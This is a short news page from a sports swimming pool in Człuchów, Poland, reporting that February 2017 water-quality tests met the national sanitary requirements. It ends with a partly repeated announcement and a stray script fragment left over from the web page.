BASEN SPORTOWY W CZŁUCHOWIE

AKTUALNOŚCI

Informujemy, iż ostatnie wyniki badań jakości wody w naszym obiekcie z 09.02.2017 potwierdziły spełnienie wymagań sanitarnych określonych w rozporządzeniu Ministra Zdrowia z dnia 09.11.2015 w sprawie wymagań jakim powinna odpowiadać woda na pływalniach ( Dz. U.Poz.2016 z 2015) Informujemy, iż ostatnie wyniki badań jakości wody w naszym obiekcie z 23.02.2017 potwierdziły spełnienie wymagań sanitarnych określonych

d.getElementsByTagName(‚head’)[0].appendChild(s);